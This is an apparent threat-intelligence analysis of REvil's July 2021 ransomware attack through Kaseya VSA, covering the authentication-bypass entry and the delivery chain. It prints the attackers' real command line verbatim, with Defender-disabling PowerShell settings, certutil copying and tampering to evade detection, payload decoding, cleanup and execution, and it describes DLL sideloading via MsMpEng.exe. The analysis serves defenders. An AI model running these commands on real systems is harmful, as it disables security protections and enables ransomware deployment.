On 02 July 2021, Kaseya, an IT solutions developer catering to managed service providers (MSPs), disclosed that they were the victim of a large-scale ransomware attack. The attack, which was propagated by the popular RaaS group REvil, targeted Kaseya’s VSA infrastructure, compromising its supply chains. The ransomware group exploited a specific zero-day authentication vulnerability in the application to upload a malicious Base64 encoded file, infecting client infrastructure that has a VSA agent program running on the target servers.
Kaseya’s VSA is a Remote Monitoring and Management (RMM) software that enables MSPs to perform patch management, backups, and client monitoring for customers. The threat actors leveraged a zero-day authentication bypass vulnerability in the web interface of VSA, to gain an authenticated session, upload payload, and execute a series of commands via SQL to gain command execution. The ransomware was delivered as a software update masquerading as “Kaseya VSA Agent Hot-fix.” This procedure deployed an encryptor, which compromised the VSA server and was dropped in TempPath, under the filename “agent.crt.”
The payload file “agent.crt” is sent to an agent monitor program (C:\PROGRAM FILES (X86)\KASEYA<ID>\AGENTMON.EXE, where ID is identification key for the server connected to the monitor instance), which monitors customer endpoints and determines if a terminal requires patching or updates, only to install them silently in the background. The agent monitor then writes “agent.crt” to the VSA agent working directory (C:\KWORKING\AGENT.crt).
"C:\WINDOWS\system32\cmd.exe" /c ping 127.0.0.1 -n 4979 > nul &C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Set-MpPreference -DisableRealtimeMonitoring $true -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend & copy /Y C:\Windows\System32\certutil.exeC:\Windows\cert.exe & echo %RANDOM% >> C:\Windows\cert.exe & C:\Windows\cert.exe -decode c:\kworking\agent.crt c:\kworking\agent.exe & del /q /f c:\kworking\agent.crt C:\Windows\cert.exe & c:\kworking\agent.exe
The following command is used to delay or disable the execution of PowerShell commands:
"C:\WINDOWS\system32\cmd.exe" /c ping 127.0.0.1 -n 4979 > nul
Followed by which, a PowerShell command is executed by the Agent monitor, as shown below:
EnableNetworkProtection AuditMode -Force
These commands disable various protections implemented on the target system, specifically features of Windows Defender, such as network protection, IOfficeAntiVirus (IOAV), script scanning, MAPS Reporting, etc.
The following command creates a copy of the “certutil.exe” file, a certificate management utility present in all Windows versions, from the default location to Windows Directory and renames it as “cert.exe”:
copy /Y C:\Windows\System32\certutil.exe C:\Windows\cert.exe
This command-line appends random data to the end of cert.exe to change its signature, which helps to evade anti-malware security products:
echo %RANDOM% >> C:\Windows\cert.exe
The next command decodes the “agent.crt” file to “agent.exe”:
C:\Windows\cert.exe -decode c:\kworking\agent.crt c:\kworking\agent.exe
Followed by which, this command line cleans up the file and executes “agent.exe”:
del /q /f c:\kworking\agent.crt C:\Windows\cert.exe & c:\kworking\agent.exe
Agent.exe is a dropper that downloads the following artifacts:
REvil uses a particular version of “MsMpEng.exe,” which is vulnerable to Dynamic-link library (DLL) sideloading, which is a popular cyber attack method that takes advantage of how applications handle DLL files. It uses malicious DLL files instead of legitimate ones, which is then loaded and executed, infecting the target server.
A Ransomware Locker is hidden in the “mpsvc.dll” file and is executed when “MsMpEng.exe” is executed by the file “agent.exe”. This is an evasion tactic employed by the threat actor to bypass security checks.